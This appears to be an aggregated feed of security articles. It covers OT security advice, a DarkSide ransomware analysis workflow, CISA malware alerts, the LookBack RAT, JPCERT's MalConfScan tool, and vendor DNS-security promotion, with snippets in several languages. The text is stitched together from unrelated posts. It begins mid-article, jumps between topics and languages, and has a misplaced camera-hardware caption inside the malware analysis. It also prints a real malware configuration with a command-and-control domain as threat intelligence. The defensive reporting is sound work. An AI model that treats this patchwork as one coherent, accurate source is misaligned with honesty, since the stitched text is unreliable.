Consider disabling legacy versions of the SMB protocol and migrating business applications to SMB v3.1. This activity requires careful planning and risk evaluation due to its potential impact on business operations.

6. Avoid the use of Portable Media: Uncontrolled portable media significantly increase the risks to the legacy OT environments, as OT systems may not have the latest security patches to defend against newer attack methodologies. Uncontrolled and unsecured allowance of portable media can expose an OT network to exploits and unplanned outages and downtime.

Have a security policy for secure use of portable media in OT environments.
Ideally, strictly prohibit use of USB flash drives. Should there be an absolute necessity of using one, designate a single USB stick for any maintenance and re-format it every time you use it.
Implement processes and technical controls that adequately support the security policy requirements. Controls may include, but are not limited to the following:
Every use of the device is documented in the logbook
The devices are scanned on designated quarantine PCs to ensure robust AV scan before using on OT endpoints. Ensure that anti-malware software is configured to automatically scan portable media
Control the number of portable media devices approved to be used in the environment
Disable autorun and autoplay auto-execute functionality for removable media.

Consider implementing Secure Media Exchange solutions such as Honeywell SMX or OPSWAT MetaDefender.

7. Rehearse Disaster Recovery (DR) and Incident Response (IR) scenarios regularly: DR plans should be documented, reliable backups should be available, and OT personnel must have an understanding and intimate knowledge of how the system should be recovered. IR and DR exercises should be conducted regularly to build the muscle memory needed for reliable recovery. Educate your team about imminent security threats and make them part of the security process. As part of any plan, have a direct line with your organization’s CSIRT: your best play is always a fast response and a transparent environment, so be organized and report everything.

8. Employ network monitoring solutions: Firewalls, Access Control Lists (ACLs) and Intrusion Prevention Systems (IPS) can assist in keeping a close eye on traffic traversing your network. Check for new nodes or machines communicating with suspicious assets. If you employ an intrusion detection system (IDS), ensure your signatures are up to date. Even when monitoring for old malware, new signatures appear every day.

While it isn’t common for an OT network to be infected with older malware like WannaCry or Conficker, documented cases do indeed exist, and they can leave costly destruction and even safety consequences in their wake.

To learn how X-Force can keep your network safer, download the X-Force for OT solution brief.

Read the 2022 X-Force Threat Intelligence Index Report to understand the latest OT Threats

The post Where Everything Old is New Again: Operational Technology and Ghost of Malware Past appeared first on Security Intelligence.

Analyzing New Malware

In the ever-changing world of cybersecurity, new threats appear and evolve on a regular basis. Sharing information about them is an important part of fighting cybercrime and keeping people and organizations safe. To do so efficiently, being prepared will make the best use of your—and your team’s—time when analyzing an emerging threat.

In this blog, we cover various situations that researchers encounter when they need to publish their findings and provide some suggestions on how to approach them, along with a suggested workflow for approaching the analysis most efficiently. Finally, we apply this strategy to analyze a ransomware sample.

Efficient analysis of new executable samples is extremely important when sharing information on evolving threats

Efficient analysis is extremely important when investigating new malware.

Challenges and Solutions

When a new threat emerges, there are a few common challenges that researchers face during analysis. Here are a few ways to handle them so you can produce clear and purposeful findings.

Urgency

In many cases, there is a relatively narrow window of time in which to release the publication, if we want the topic to be hot and the corresponding material to be relevant.

The solution is to focus on the most important questions that need answers.

Who are the potential readers of the article? How will they benefit from reading it?
How will the time costs associated with each section compare to its benefits?

Beginning your work by answering these questions will help shape the material in the right direction and manage time properly.

Novelty

For many attacks that hit the news, the related malware may not yet have been analyzed by other researchers. This increases the amount of work required to understand all parts of the relevant functionality, as there is little to no information to use as a starting point.

To address this issue, it is worth remembering that in many cases, modern malware families and attacker groups already have some roots. Tracking these connections allows researchers to find previous iterations of similar projects and reduce the amount of time required to understand malware’s functionality.

Complexity

The consequences of simple cyberattacks aren’t generally big enough to attract the attention of the public. What that means for researchers is that if something is worth writing an article about, it’s likely to be quite complex and therefore time-consuming to analyze.

The solution here might be to split the big task into smaller tasks. Apart from prioritizing based on the article’s focus, it also allows the analysis to done by a group, with different people focusing on different parts of functionality. Exchanging knowledge on a regular basis about what has already been covered will help the team to be efficient and not waste time analyzing the same parts multiple times.

Suggested Workflow

Here is a common workflow that should allow researchers to approach the analysis of new executable samples efficiently and effectively.

The second step, Behavioral Analysis, refers to the blackbox-style analysis that generally involves the execution of a sample under various monitoring tools and on sandboxes. The Dynamic Analysis step refers the use of a debugger to execute instructions.

Steps

Actions

1. Triage

Collect as much easily-accessible open information as possible. This can come from existing articles, public sandbox reports, or other vendors’ detections.

Check for the presence of high-entropy blocks, import table or syscalls and strings to understand if it likely to be packed or not.

Check if some official (non-malicious) packers were used by using packer detection tools.

2. Behavioral Analysis

Conduct this analysis if it is easy to restore the lab environment after execution.

It may not be necessary if good public sandbox reports are already available.

Keep in mind that, often, behavioral analysis doesn’t show the full picture.

It may not go as expected because of anti-RE techniques involved.

3. Unpacking – Optional

Not necessarily present, some malware developers prefer to only use obfuscation.

For official packers, there are multiple existing unpacking tools and scripts already available.

Ideally, the unpacked sample should remain executable to make the dynamic analysis easy. Otherwise, get as much unpacked code and data as possible.

4. Static and Dynamic Analysis of the Actual Functionality

This step only becomes possible once the unpacking is done (if it was necessary).

Generally, strings and APIs give the maximum information and serve as important landmarks to facilitate navigation within the samples.

Keep the markup accurate: rename functions, create structures, define enums and leave comments where necessary.

Debugging is mainly needed to decrypt/decode/decompress code and data and resolve APIs. Static analysis is generally enough for the rest.

Applying the Workflow to Malware Analysis

Let’s take a look at a DarkSide ransomware sample, which we analyzed earlier this year: 0a0c225f0e5ee941a79f2b7701f1285e4975a2859eb4d025d96d9e366e81abb9

Step 1: Triage

At the time of analysis, the sample had already been uploaded to Virustotal, so all cybersecurity community members could benefit from access and were able to see AV vendors’ detections as well as the sandbox logs in the Behavior tab. Note that there are now multiple sandboxes supported in Virustotal, so try a few to find a good report.

Multiple sandbox options on Virustotal.

A quick look at the sample in the hex editor reveals that there is a high-entropy block at the end. There are multiple things it could be: the next stage payload or another module, a blob containing encrypted strings or configuration, etc. Static analysis will be required to understand it.

A high-entropy block

A high-entropy block.

There are pretty much no meaningful strings and APIs:

PCB overview of the Verkada D40 camera.

Very few entries in the import table.

This is a strong indicator that the sample is obfuscated with APIs resolved dynamically and strings encrypted. Running a packer detection tool (PEiD with custom community signatures) confirms that there is no indication that public packers have been used in this case.

PEiD did not identify any known packers

PEiD did not identify any known packers.

Step 2: Behavioral Analysis

By the time the analysis began, the sample had already been submitted to various public sandboxes by other community members, so lots of information could be taken from there.

File activity in the public any.run report

File activity in the public any.run report.

Step 3: Unpacking

Checking cross-references to the high-entropy block in the disassembler, we can see that this doesn’t seem to be the next stage payload as there is no control transfer to it or related blocks. In addition, a quick look around the disassembly confirms that the sample is indeed obfuscated rather than packed with multiple APIs resolved dynamically by hashes and with strings encrypted.

API resolution by hashes

API resolution by hashes.

A call to the not-yet-resolved API

A call to the not-yet-resolved API.

Step 4: Static and Dynamic Analysis of the Actual Functionality

In order to be able to efficiently navigate the disassembly, we need to make APIs and strings easily readable.

For APIs, this is very easy to achieve with dynamic analysis as all the APIs are resolved in a single function. Therefore, letting it execute until the end will give us all the APIs’ addresses. To propagate their names to the pointers, use standard renimp.idc script shipped as part of IDA Pro.

Resolved APIs’ names

Resolved APIs’ names.

This approach won’t work for strings, as they’re decrypted on an ad-hoc basis just before being used, rather than in a single place. Therefore, to make them easily visible, scripting will be required. In our blog on Darkside, we have already provided such a script that will attempt to find all the encrypted strings and decrypt them.

Before string decryption

Before string decryption.

After string decryption.

That’s it. Now when both strings and APIs are visible, the only thing left to engineer is to carefully go through cross references and keep the markup for the corresponding functions describing all potentially interesting information (subject to the target audience) in the article.

Conclusion

Knowledge sharing is an important part of the cybersecurity field that allows us to quickly adapt to new threats and minimize their associated risks. By properly focusing our efforts, we can improve the quality of this process and make the world a safer place.

Extra Tips

Know your audience – the content of the technical blog post (and the corresponding questions to answer) will be very different from a news article for the general public
Consider teamwork to speed up the process – Asking for help if at an early stage helps increase the total time available for the analysis
Have your templates ready – simple scripts to decrypt / decode / decompress the data may help avoid unnecessary delays

Related Content

RESEARCH REPORT
OT/IoT Security Report

What You Need to Know to Fight Ransomware and IoT VulnerabilitiesJuly 2021

RANSOMWARE

Why ransomware is a formidable threat
How Ransomware as a Service works
Analysis of DarkSide, the malware that attacked Colonial Pipeline

VULNERABILITIES

Latest ICS and medical device vulnerability trends

IoT SECURITY CAMERAS

Why P2P security camera architecture threatens confidentiality
How security cameras are vulnerable
Research findings on surveillance cameras

RECOMMENDATIONS

Ten measures to take immediately to defend your systems

Download

Related Links

Blog: BlackMatter Ransomware Technical Analysis and Tools from Nozomi Networks Labs
Blog: Critical Log4shell (Apache Log4j) Zero-Day Attack Analysis
Blog: Colonial Pipeline Ransomware Attack: Revealing How DarkSide Works
Blog: Enhancing Threat Intelligence with the MITRE ATT&CK Framework

The post How to Analyze Malware for Technical Writing appeared first on Nozomi Networks.

Original release date: July 7, 2021 | Last revised: July 8, 2021

CISA has published a new [Malware Analysis Report (MAR) on DarkSide Ransomware] and updated Alert AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks, originally released May 11, 2021. This update adds indicators of compromise associated with a DarkSide ransomware variant that executes a dynamic-link library used to delete Volume Shadow copies available on the system.

CISA encourages users and administrators to review the following resources for more information:

AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
Malware Analysis Report MAR-10337801-1.v1

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: April 22, 2021

CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response to provide analysis of a compromise in an organization’s enterprise network by an advance persistent threat actor. This report provides tactics, techniques, and procedures CISA observed during the incident response engagement.

CISA encourages organizations to review AR21-112A for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

AR21-112A

Original release date: April 15, 2021

CISA and the Department of Defense (DoD) Cyber National Mission Force (CNMF) have analyzed additional SolarWinds-related malware variants—referred to as SUNSHUTTLE and SOLARFLARE. One of the analyzed files was identified as a China Chopper webshell server-side component that was observed on a network with an active SUNSHUTTLE infection. The webshell can provide a cyber threat actor an alternative method of accessing a network, even if the SUNSHUTTLE infection was remediated.

The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR).

CISA encourages users and administrators to review Malware Analysis Report MAR-10327841-1.v1, U.S. Cyber Command’s VirusTotal page, and the following resources for more information:

CISA web page: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise
CISA web page: Supply Chain Compromise
CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: March 17, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on TrickBot malware. A sophisticated group of cyber criminals are using phishing emails claiming to contain proof of traffic violations to lure victims into downloading TrickBot. TrickBot is a highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.

To secure against TrickBot, CISA and the FBI recommend users and administrators review AA21-076A: TrickBot Malware as well as CISA’s Fact Sheet: TrickBot Malware for guidance on implementing specific mitigation measures to protect against this activity.

This product is provided subject to this Notification and this Privacy & Use policy.

A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.

Es wurde eine Schwachstelle in Malwarebytes bis 3.x auf macOS (Anti-Malware Software) gefunden. Sie wurde als problematisch eingestuft. Betroffen hiervon ist die Funktion posix_spawn der Komponente Launch Daemon. Ein Upgrade auf die Version 4.0 vermag dieses Problem zu beheben.

Una vulnerabilità di livello problematico è stata rilevata in Malwarebytes fino 3.x su macOS (Anti-Malware Software). Riguarda la funzione posix_spawn del componente Launch Daemon. L’aggiornamento alla versione 4.0 elimina questa vulnerabilità.

An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.

An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…

Read the original article: Expert launched Malvuln, a project to report flaws in malware The researcher John Page launched malvuln.com, the first website exclusively dedicated to the research of security flaws in malware codes. The security expert John Page (aka hyp3rlinx) launched malvuln.

Publication date: 11/20/2020

Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.

These services have been offered in the underground market since 2010 for a value of no more than $300 per license, with regular updates and customer support. They have also been used by more than 1.560 cybercriminals with different types of malware.

The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.

11/20/2020

Tags:
Cybercrime, Encryption, Incident, Internet, Malware, Other critical infrastructures

References:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.euhttps://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software20/11/2020sienen Romanians arrested for running underground malware servicessecurityaffairs.cohttps://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html22/11/2020sienen Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.clhttps://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html23/11/2020sieses

Fecha de publicación: 20/11/2020

Dos ciudadanos rumanos han sido arrestados por, presuntamente, administrar los servicios de cifrado de malware, CyberSeal y Dataprotector, para eludir la detección de software antivirus, y el servicio Cyberscan para testear malware frente a antivirus.

Estos servicios han sido ofrecidos en el mercado clandestino desde el 2010 por un valor no superior a los 300 dólares por licencia, contando además con actualizaciones periódicas y soporte para el cliente. Asimismo, han sido utilizados por más de 1.560 ciberdelincuentes con diferentes tipos de malware.

La operación policial, coordinada por el Centro Europeo de Ciberdelincuencia (EC3), resultó en varios registros domiciliarios en Bucarest y Craiova, y en la neutralización de su infraestructura backend en Rumania, Noruega y EEUU.

20/11/2020

Etiquetas:
Cibercrimen, Cifrado, Incidente, Internet, Malware, Otras infraestructuras críticas

Referencias:

Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.

Una severa vulnerabilidad existe en casi todas las versiones firmadas de GRUB2, el cual es usado por la mayoría de los sistemas Linux. De explotarse adecuadamente, permitiría a los atacantes comprometer el proceso de arranque del sistema, incluso si el mecanismo de verificación «Secure Boot» está activo.

La falla fue reportada por Eclypsium el 29 de julio aunque el CVE-2020-10713 asociado tiene fecha del 20 de marzo, y si bien grub2 podría relacionarse más directamente con sistemas Linux, los equipos con arranque dual (o múltiple) abre la puerta a la explotación hacia otros sistemas como Windows.

Se encontró una falla en las versiones previas a 2.06 de grub2. Un atacante puede usar la falla en GRUB 2 para secuestrar y manipular el proceso de verificación de GRUB. Esta falla también permite eludir las protecciones de arranque seguro (Secure Boot). Para poder cargar un kernel no confiable o modificado, un atacante primero necesitaría disponer de acceso al sistema, como obtener acceso físico, tener la posibilidad de alterar una red «pxe-boot» o tener acceso remoto a un sistema en la red con acceso de root. Con este acceso, un atacante podría forjar una cadena para causar un desbordamiento del búfer inyectando una carga maliciosa, que conduzca a la ejecución de código arbitrario dentro de GRUB. La mayor amenaza de esta vulnerabilidad es la confidencialidad e integridad de los datos, así como la disponibilidad del sistema.

https://cve.mitre.org/cgi-bin//cvename.cgi?name=CVE-2020-10713

Según el reporte de BleepingComputer, ha compartido la vulnerabilidad con los proveedores de sistemas operativos, los fabricantes de computadoras y los CERT/CSIRT. Se espera que hoy mismo se publiquen avisos y mitigaciones posibles de múltiples organizaciones en la industria.

Vemos el problema con baja probabilidad de ocurrencia o al menos con alta dificultad, pues como se indica en la cita del CVE, requiere condiciones especiales para llegar a explotar la vulnerabilidad. Esto no significa que nos podamos despreocupar, más bien debemos estar muy pendientes de las actualizaciones que irán llegando de los diferentes fabricantes.

Here’s what’s changed in the NCSC’s guidance on mitigating malware and ransomware.

On August 1, security researchers at Proofpoint reported the details of a spearphishing campaign targeting three different United States utility companies using a malware called “LookBack.” The spearphishing emails, sent between July 19 and July 25, contained a malicious Microsoft Word attachment that installed a Remote Access Trojan (RAT) capable of performing activities like deleting files, taking screenshots, rebooting machines, and then deleting itself from an infected network.

While Prooftpoint was able to confirm the presence of LookBack malware at three companies, it is likely that the malware has infected other organizations as well. The emails used in the spearphishing campaign falsely appeared to be from the National Council of Examiners for Engineering and Surveying (NCEES), an American nonprofit organization that handles professional licensing for engineers and surveyors. Even fraudulently using the NCEES logo, the emails included Word documents embedded with malicious micros that, once opened, installed and ran the never-before-seen RAT.

Researchers told Threatpost that the emails were blocked before they could infect the unnamed utility companies.

How LookBack Works

According to the report by Proofpoint, LookBack is a RAT that relies on a proxy communication tool to relay data from the infected host to a command-and-control server (C2). The malware can view process, system and file data; delete files; take screenshots; move and click the infected system’s mouse; reboot machines; and delete itself from an infected host.

Researchers said that the LookBack spearphishing campaign used tactics once used by known APT adversaries targeting Japanese corporations in 2018 – which highlights the rapidly evolving nature of malware and its use by nation-state actors.

The Microsoft Word document attached to the phishing emails contains a VBA macro that drops three different Privacy Enhanced Mail (PEM) files when executed. Certutil.exe is then dropped to decode PEM files, which are later restored to their true extensions using essentuti.exe. The files then impersonate the name of an open-source binary used by common tools like Notepad++, which contains the C2 configuration. Finally, the macro runs GUP.exe and libcurl.dll to execute the LookBack malware. Once executed, LookBack can send and receive numerous commands, such as Find files, Read files, Delete files, Write to files, Start services, and more.

Has Your Organization Been Exposed to LookBack? Here’s How to Detect It.

Due to the nature of the threat, it’s important to have multiple controls in place to detect the activities related. This includes continuous security awareness training for employees and personnel to help them better identify fake and malicious emails. But beyond SPAM filters and firewalls, Nozomi Networks Labs recommends the use of both anomaly detection technologies to identify unusual behavior, and the use of traditional threat detection capabilities to provide additional context around suspicious actors related to known threats.

Within 24 hours of the announcement of this attack, the Nozomi Networks Labs team added new rules and signatures to the OT ThreatFeed to help detect LookBack in your environment. This means that alerts will now be triggered for suspicious activity related to the known threat, LookBack, so that you can detect and remediate quickly. For customers using OT ThreatFeed, please make sure that your systems are running the latest version (from August 2, 2019) to enable these new rules.

With cyberthreats against utilities continuing to rise, LookBack is just another reminder that there’s still much work to be done as utility companies continue to strengthen their cyber security.

REGISTER FOR THE WEBINAR
How to Detect LookBack Malware

Tuesday, August 16th, 2019
9:00 AM PDT

Related Links

Proofpoint Blog: LookBack Malware Targets the United States Utilities Sector with Phishing Attacks
SecurityWeek Article: New LookBack Malware Used in Attacks Against U.S. Utilities Sector
Threatpost Article: Nation-State APTs Target U.S. Utilities With Dangerous Malware
Blog: IEC 62351 Standards for Securing Power System Communications
Blog: Advancing IEC Standards for Power Grid Cyber Security
Webpage: Real-time Visibility and Cyber Security for Electric Utilities
Webpage: Mitigating ICS Cyber Incidents
Webpage: Nozomi Network Labs
Webpage: OT ThreatFeed

The post What You Need to Know About LookBack Malware & How to Detect It appeared first on Nozomi Networks.

In malware analysis, extracting the configuration is an important step. Malware configuration contains various types of information which provides a lot of clues in incident handling, for example communication details with other hosts and techniques to perpetuates itself. This time, we will introduce a plugin “MalConfScan with Cuckoo” that automatically extracts malware configuration using MalConfScan (See the previous article) and Cuckoo Sandbox (hereafter “Cuckoo”).
This plugin is available on GitHub. Feel free to download from the webpage below:

JPCERTCC/MalConfScan – GitHub
https://github.com/JPCERTCC/MalConfScan-with-Cuckoo

About MalConfScan with Cuckoo

“MalConfScan with Cuckoo” is a plugin for Cuckoo, which is an open source sandbox system for dynamic malware analysis. By adding this plugin to Cuckoo, MalConfScan runs on Cuckoo, enabling automatic extraction of malware configuration . Figure 1 shows Cuckoo’s behaviour where “MalConfScan with Cuckoo” is installed.

Figure 1：Behaviour of “MalConfScan with Cuckoo”

“MalConfScan with Cuckoo” runs malware on the host machine to extract configuration. When malware is registered on Cuckoo and executed on the host machine, a memory image will be dumped, from which MalConfScan extracts configuration of known malware. Extracted configuration will then be shown in a report. Please see the previous article or the following page for the list of malware that this tool supports.

JPCERTCC/MalConfScan – GitHub
https://github.com/JPCERTCC/MalConfScan/

Instruction and report example

First, upload malware on Cuckoo that has “MalConfScan with Cuckoo” installed by using Web GUI or commands. An official document from Cuckoo [1] provides details about the upload procedures. When the upload and analysis is completed, a report will be provided as in Figure 2.

Figure 2：Report of “MalConfScan with Cuckoo”

Figure 2 shows the configuration of malware Himawari, a variant of RedLeaves which is used in targeted attacks. It is a kind of bot, and the configuration contains C&C server, destination port, protocol, encryption key etc. In this way, “MalConfScan with Cuckoo” can easily extract configuration for known malware.
Additionally, the results can also be obtained in JSON format. report.json records the following data:

“malconfscan”: {
“data”: [
{
“malconf”: [
[
{“Server1”: “diamond.ninth.biz”},
{“Server2”: “diamond.ninth.biz”},
{“Server3”: “diamond.ninth.biz”},
{“Server4”: “diamond.ninth.biz”},
{“Port”: “443”},
{“Mode”: “TCP and HTTP”},
{“ID”: “2017-11-28-MACRO”},
{“Mutex”: “Q34894iq”},
{“Key”: “usotsuki”},
{“UserAgent”: “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)”},
{“Proxy server”: “”},
{“Proxy username”: “”},
{“Proxy password”: “”}
] ],
“vad_base_addr”: “0x04521984”,
“process_name”: “iexplore.exe”,
“process_id”: “2248”,
“malware_name”: “Himawari”,
“size”: “0x00815104”
}
],
},

How to install

The following steps are required before installing “MalConfScan with Cuckoo”:

Install MalConfScan
Apply patches for Cuckoo
Change configuration of Cuckoo

For more information about how to install the tool, please see our wiki on the GitHub:

MalConfScan-with-Cuckoo Wiki – GitHub
https://github.com/JPCERTCC/MalConfScan-with-Cuckoo/wiki

Ubuntu 18.04
Python 2.7.16
Cuckoo 2.0.6
Volatility 2.6

A blog article by @soji256 explains procedures to install “MalConfScan with Cuckoo”, which can be a good reference.

Installing the MalConfScan with Cuckoo to Analyze Emotet – Medium
https://medium.com/@soji256/build-a-malconfscan-with-cuckoo-environment-to-analyze-emotet-ff0c4c589afe

In closing

This plugin enables extracting configuration of known malware from sandbox. Even in case where malware has anti-VM or anti-sandbox function, we can still extract the configuration by spoofing some environmental information.
We will present the details of “MalConfScan” and “MalConfScan with Cuckoo” at the coming Black Hat USA 2019 Arsenal [3]. Feel free to stop by if you are attending Blackhat USA 2019, and we look forward to having active discussion and feedback from analysts.

Tomoaki Tani(Translated by Yukako Uchida)

[1] Cuckoo Docs – Submit an Analysis https://cuckoo.sh/docs/usage/submit.html

[2] “Abnormal Encryption of Himawari” – Japan Security Analyst Conference [Japanese] https://www.jpcert.or.jp/present/2018/JSAC2018_01_nakatsuru.pdf

[3] MalConfScan with Cuckoo: Automatic Malware Configuration Data Extraction and Memory Forensic – Black Hat USA 2019 https://www.blackhat.com/us-19/arsenal/schedule/index.html#malconfscan-with-cuckoo-automatic-malware-configuration-data-extraction-and-memory-forensic-16914

Every day, new types of malware are discovered. However, many of them are actually variants of existing malware – they share most part of the code and there is a slight difference in configuration such as C&C servers. This indicates that malware analysis is almost complete as long as the configuration is extracted from malware.
In this article, we would like to introduce details of “MalConfScan”, a tool to extract malware configuration, developed by JPCERT/CC. This tool is available on GitHub. Feel free to download from the webpage below:

JPCERTCC/MalConfScan – GitHub https://github.com/JPCERTCC/MalConfScan

Read the Wiki to learn how to install the tool:
MalConfScan wiki – GitHub https://github.com/JPCERTCC/MalConfScan/wiki

About MalConfScan

MalConfScan is a plugin for The Volatility Framework (hereafter “Volatility”), a memory forensic tool. In most cases, malware analysis begins with unpacking the malware to extract configuration. MalConfScan extracts configuration from unpacked executable files loaded on the memory.
MalConfScan can perform the following functions:

malconfscan: Extract configuration of known malware from a memory image
malstrscan: Detect suspicious processes from a memory image and list the string that it refers to
malconfscan

Figure 1 is an example of malconfscan execution. First, a malware-injected process name (Name), the process ID (PID) and the name of the detected malware (Malware Name) are displayed. Malware configuration (Config info) is also displayed.

Figure 1：malconfscan execution result (Detected “Lavender”, a RedLeaves variant)

malconfscan also decodes encoded strings and displays DGA domains. Figure 2 is the result where malconfscan detected Bebloh. DGA domains are listed following the configuration.

Figure 2：malconfscan execution result (Detected Bebloh)

As of 30 July 2019, malconfscan is compatible with 25 types of malware. See Appendix for supported malware.

malstrscan

malstrscan detects Process Hollowing on the memory and lists the strings that the process refers to. Although malware configuration is usually encoded, malware decodes it when referring to the information, and this is sometimes left on the memory. This function can pick up such remaining configuration. Figure 3 is an example of malstrscan execution.

Figure 3：malstrscan execution results

malstrscan lists strings only from the memory space where the PE file is loaded. With ‘-a’ option, it can also list strings in heap and parent memory space.

In closing

malconfscan can be used for malware analysis and memory forensics. We hope that this tool helps incident investigation. We plan to update this tool in the future to make it compatible with many other types of malware.
In the next article, we will install this tool in Cuckoo Sandbox to automatically extract malware configuration.

Shusei Tomonaga
(Translated by Yukako Uchida)

Appendix A Malware Compatible with MalConfScan

Table 1: Compatible malware
Malware
Ursnif
HawkEye Keylogger
Emotet
Lokibot
Smoke Loader
Bebloh
Poison Ivy
AZORult
CobaltStrike
NanoCore RAT
NetWire
AgentTesla
PlugX
FormBook
RedLeaves
NodeRAT
TSCookie
njRAT
TSC_Loader
TrickBot
xxmm
Remcos
Datper
QuasarRAT
Ramnit

Listen over de identificerede malware-varianter i juni måned viser en tilbagevenden af WannaCry- og Tinba-aktiviteter.

Tendensen er stadig at de ti varianter, der identificeres oftest, står for mere end 60 procent af de samlede malware-identifikationer.

Fordelingen over de hyppigst optrædende malware-navne ser således ud for juni 2019:

Sprog
Dansk

Keywords: malwareLæs mere om Top-10 over malware i juni

I ricercatori di sicurezza del team Unit 42 di Palo Alto Networks hanno scoperto il malware per macOS CookieMiner, progettato per “rubare” i cookie associati a siti Web per lo scambio di criptovalute.

There are two types of companies: Those who have been hacked, and those who don’t yet know they have been hacked1

With data breaches frequently making the news and causing panic among network administrators, the above statement by former Cisco boss John Chambers in 2015 certainly doesn’t seem far-fetched. I don’t remember a week in 2018 going by where I wasn’t learning of a data breach and how sophisticated the attack was. Well, except for the time I didn’t have internet access while visiting the Salt Cathedral of Zipaquirá, and I couldn’t understand why. Then, there was the time I had no access on a cruise, but I digress.

The consequences of a data breach are far reaching and include the tangible and intangible. It should come as no surprise that information security is the top concern for CISOs and CIOs of companies. Some of these companies are embracing cloud-native initiatives that have improved organizational agility, reduced products’ time-to-market, and leveled the playing field with respect to computational power. However, they lose visibility into the expanded environment, causing concerns over whether they can adequately secure their cloud environment the way they would their traditional network.

These well-founded concerns are understandable. Traditional network security solutions being used in combating the current cyber-crimewave have only increased the complexity and risk for businesses. Fraudsters have amped up their phishing techniques to deploy sophisticated malware on network devices(human controlled and otherwise) as part of ransomware campaigns, steal sensitive data, or other criminal activities.

It’s far more important to keep an eye on what’s traveling out of the network….Today, malicious actors aren’t interested in scaling the castle wall and capturing the flag. They want to exfiltrate the flag.2

We should always remind ourselves of the statement above made by John Kindervag and add to our focus, ways to prevent any data exfiltration to unauthorized sources in our network. Companies have typically leveraged endpoint solutions in addition to other network elements to protect against malware used for that purpose. However, in combating the cyber-criminals of today, companies need to embrace a defense-in-depth security strategy where all network layers used in accessing data should be secure and this includes the DNS layer. DNS is an often overlooked layer for security and yet, is integral to network functionality. It’s the protocol we use to locate resources on a network. We use it to access our favorite websites, whether news or social media. We use it to access the printers or storage devices, when accessing the security cameras in the data centers and even to send emails. It’s also used by unsuspecting victims to access phishing websites from where malware is downloaded. It is also used by malware to locate control servers on internet. These servers could serve as destinations of data stolen (also using DNS protocol) from digital assets inside companies. These servers could also be used to download keys used to encrypt digital assets as part of ransomware activities.

And so, it’s wise and imperative to secure the DNS layer as part of a defense-in-depth security strategy. As a security control point, DNS layer security offers a proactive way to uniformly and immediately block malicious domains and communications for all of your users, whether they are on or off network. It can also deliver lower latency, fewer broken sites and apps, and improved network performance.

These are drivers for the Akamai Enterprise Threat Protector (ETP) solution. ETP is a Secure Internet Gateway solution that is really about advanced threat protection in the cloud for all your users everywhere and using that as your safe onramp to the internet. ETP uses multiple layers of protection — DNS, URL, and inline payload analysis — to provide security with reduced complexity and without impacting performance. Companies simply need to direct their recursive DNS traffic to Enterprise Threat Protector global servers where all requested domains are checked against Akamai’s real-time domain risk scoring threat intelligence. Safe domains are resolved as normal, malicious domains are blocked, and risky domains are sent to a smart selective proxy where the HTTP or HTTPS URLs are inspected to determine if they are malicious. The HTTP and HTTPS payloads from risky domains are then scanned in real-time using multiple advanced malware-detection engines.

ETP improves security defenses. It reduces security complexity and increases the efficiency of security teams. Find out more here.

I marts 2018 blev projektet URLhaus lanceret af abuse.ch, der er en non-profit cyber-sikkerhedsorganisation, baseret i Schweiz.

Formålet med URLhaus er at indsamle URL’er fra sider, der distribuerer malware, hvilket efter ti måneders arbejde har resulteret i, at samarbejdet nu har lukket ikke mindre end 100.000 sider.

256 sikkerhedsforskere, der er spredt over hele verden, rapporterer hver dag til URLhaus om malware-sider, og de hjælper på den måde internetbrugerne mod malware-kampagner.

Sprog
Dansk

Keywords: malwarenon-profitLæs mere om Non-profit samarbejde har nu lukket 100.000 malware-sider

“A First Look at the Crypto-Mining Malware Ecosystem: A Decade of Unrestricted Wealth” https://t.co/ggSw5PG4Bh #cryptomining #malware

I ricercatori di sicurezza di Malwarebytes hanno individuato un nuovo malware per macOS, battezzato DarthMiner, che combina le funzionalità della backdoor EmPyre e del cryptominer XMRig.

Using removable media like USB drives in the manufacturing automation sector is a fact of life where folks from operators Read More.

The malware is believed to have been created by US and Israeli intelligence agencies. Stuxnet is designed to alter Programmable Logic Controllers (PLCs) used in the types of industrial control systems (ICS). The Stuxnet malware has made a powerful comeback after a hiatus of almost eight years, with a new variant, impacting Iranian networks.

Mere end 500.000 brugere har ifølge sikkerhedsforsker Lukas Stefanko, der er ansat hos antivirus-producenten ESET, hentet malware-inficerede apps fra Googles egen app-butik, Google Play.

Det drejer sig om 13 forskellige spil, der er skabt af den samme udvikler, som til sammen er hentet mere end en halv million gange.

